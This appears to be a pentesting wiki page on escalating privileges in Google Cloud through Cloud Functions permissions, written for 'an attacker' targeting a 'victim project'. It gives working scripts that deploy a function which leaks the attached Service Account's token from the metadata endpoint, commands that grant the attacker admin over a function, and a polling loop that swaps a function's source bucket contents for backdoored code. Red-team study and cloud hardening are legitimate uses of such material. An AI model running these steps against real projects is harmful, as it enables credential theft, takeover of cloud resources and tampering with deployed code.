
GCP - Cloudfunctions Privesc


cloudfunctions

More information about Cloud Functions:

{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %} gcp-cloud-functions-enum.md {% endcontent-ref %}

cloudfunctions.functions.create, cloudfunctions.functions.sourceCodeSet, iam.serviceAccounts.actAs

An attacker with these privileges can create a new Cloud Function with arbitrary (malicious) code and assign it a Service Account, then leak the Service Account's token from the metadata endpoint to escalate privileges to it.
Some additional privileges to trigger the function might be required.

Exploit scripts for this method can be found here and here, and the prebuilt .zip file can be found here.
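Before deploying, it's useful to enumerate which Service Accounts exist in the project and how privileged they are, in order to pick the best one to attach. A minimal sketch, assuming gcloud is authenticated as the compromised principal and $PROJECT_ID is set:

```bash
# List the Service Accounts available in the project
gcloud iam service-accounts list --project $PROJECT_ID

# Check which project-level roles a candidate SA holds
gcloud projects get-iam-policy $PROJECT_ID \
    --flatten="bindings[].members" \
    --filter="bindings.members:serviceAccount:<sa>@$PROJECT_ID.iam.gserviceaccount.com" \
    --format="table(bindings.role)"
```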

cloudfunctions.functions.update, cloudfunctions.functions.sourceCodeSet, iam.serviceAccounts.actAs

An attacker with these privileges can modify the code of an existing Function and even change the Service Account attached to it, with the goal of exfiltrating its token.

{% hint style="danger" %} In order to deploy Cloud Functions you will also need actAs permissions over the default compute Service Account, or over the Service Account that is used to build the image. {% endhint %}

Some extra privileges, such as the cloudfunctions.functions.call permission for 1st gen Cloud Functions or the roles/run.invoker role (2nd gen functions are backed by Cloud Run), might be required to trigger the function.

# Create new code
temp_dir=$(mktemp -d)

cat > $temp_dir/main.py <<EOF
import subprocess

def main(request):
    cmd = "curl -s -f -H 'Metadata-Flavor: Google' 'http://metadata/computeMetadata/v1/instance/service-accounts/default/token'"
    result = subprocess.check_output(cmd, shell=True, text=True)
    return result
EOF

echo "" > $temp_dir/requirements.txt

# (Optional) Flat zip of the source: only needed if uploading via a signed URL,
# since gcloud zips the --source directory by itself
zip -j $temp_dir/function.zip $temp_dir/main.py $temp_dir/requirements.txt

# Deploy the new code and attach the target SA ($PROJECT_ID must be set to the victim project ID)
gcloud functions deploy <cloudfunction-name> \
  --runtime python312 \
  --source $temp_dir \
  --entry-point main \
  --service-account <sa>@$PROJECT_ID.iam.gserviceaccount.com \
  --trigger-http \
  --allow-unauthenticated

# Get SA token calling the new function code
gcloud functions call <cloudfunction-name>

{% hint style="danger" %} If you get the error Permission 'run.services.setIamPolicy' denied on resource..., it's because you are using the --allow-unauthenticated param and you don't have enough permissions for it. {% endhint %}
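If you can't make the function public, you can still invoke it authenticated, as long as your principal is allowed to call it. A rough sketch; the URL below uses the usual 1st gen format, adjust region and name as needed:

```bash
# Invoke the function with an identity token instead of --allow-unauthenticated
FUNC_URL="https://<region>-$PROJECT_ID.cloudfunctions.net/<cloudfunction-name>"
curl -s -H "Authorization: Bearer $(gcloud auth print-identity-token)" "$FUNC_URL"
```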

The exploit script for this method can be found here.

cloudfunctions.functions.sourceCodeSet

With this permission you can get a signed URL that allows you to upload a file to the function's bucket (although the code of the function won't be changed; you still need to update it).

{% code overflow="wrap" %}

# Generate the URL
curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions:generateUploadUrl \
-H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
-H "Content-Type: application/json" \
-d '{}'

{% endcode %}
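The response should contain an uploadUrl field (plus a storageSource reference to use later in the function definition). A rough sketch of pushing a flat zip to it; the exact required headers differ between 1st and 2nd gen, so treat this as an assumption:

```bash
# Upload the zip (main.py at its root) to the signed URL returned above
# 1st gen signed URLs also require: -H "x-goog-content-length-range: 0,104857600"
curl -X PUT "$UPLOAD_URL" \
    -H "Content-Type: application/zip" \
    --upload-file function.zip
```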

Not really sure how useful this permission alone is from an attacker's perspective, but it's good to know.

cloudfunctions.functions.setIamPolicy, iam.serviceAccounts.actAs

Give yourself any of the previous .update or .create privileges to escalate.
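For example, a minimal sketch of binding a powerful role on the target function to your own principal (member, region and role are placeholders):

```bash
# Grant yourself admin over the function, which includes the update permissions
gcloud functions add-iam-policy-binding <cloudfunction-name> \
    --region <region> \
    --member user:<attacker>@<domain> \
    --role roles/cloudfunctions.admin
```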

cloudfunctions.functions.update

Having only cloudfunctions permissions, without iam.serviceAccounts.actAs, you won't be able to update the function, SO THIS IS NOT A VALID PRIVESC.

Read & Write Access over the bucket

If you have read and write access over the bucket, you can monitor it for changes and, whenever an update of the code lands in the bucket, overwrite it with your own so that the new version of the Cloud Function is run with the submitted backdoored code.

You can check more about the attack in:

{% content-ref url="gcp-storage-privesc.md" %} gcp-storage-privesc.md {% endcontent-ref %}
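As a rough illustration of the race (the bucket name pattern and object layout are assumptions, check them in the victim project):

```bash
# Watch the function's source bucket and overwrite freshly uploaded code with a backdoored zip
BUCKET="gs://gcf-sources-<project-number>-<region>"   # assumed default name pattern
SEEN=""
while true; do
    LATEST=$(gsutil ls "$BUCKET/**.zip" 2>/dev/null | tail -n 1)
    if [ -n "$LATEST" ] && [ "$LATEST" != "$SEEN" ]; then
        gsutil cp backdoored-function.zip "$LATEST"   # replace the just-uploaded source
        SEEN="$LATEST"
    fi
    sleep 5
done
```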

However, you cannot use this to pre-compromise third-party Cloud Functions: if you create the bucket in your own account and give it public permissions so the external project can write to it, the deployment fails with an error.

{% hint style="danger" %} This could still be used for DoS attacks. {% endhint %}

Read & Write Access over Artifact Registry

When a Cloud Function is created, a new Docker image is pushed to the project's Artifact Registry. I tried to modify the image with a new one, and even to delete the current image (and the cache image), and nothing changed; the Cloud Function kept working. Therefore, it might be possible to abuse a Race Condition attack like with the bucket to change the Docker container that will be run, but just modifying the stored image isn't enough to compromise the Cloud Function.
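To inspect what gets pushed there, a quick sketch; the gcf-artifacts repository name is the usual default, but treat it as an assumption:

```bash
# List Artifact Registry repositories and the Cloud Functions images stored in them
gcloud artifacts repositories list --project $PROJECT_ID

# Cloud Functions images typically end up in a repo called "gcf-artifacts" (assumption)
gcloud artifacts docker images list <region>-docker.pkg.dev/$PROJECT_ID/gcf-artifacts
```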
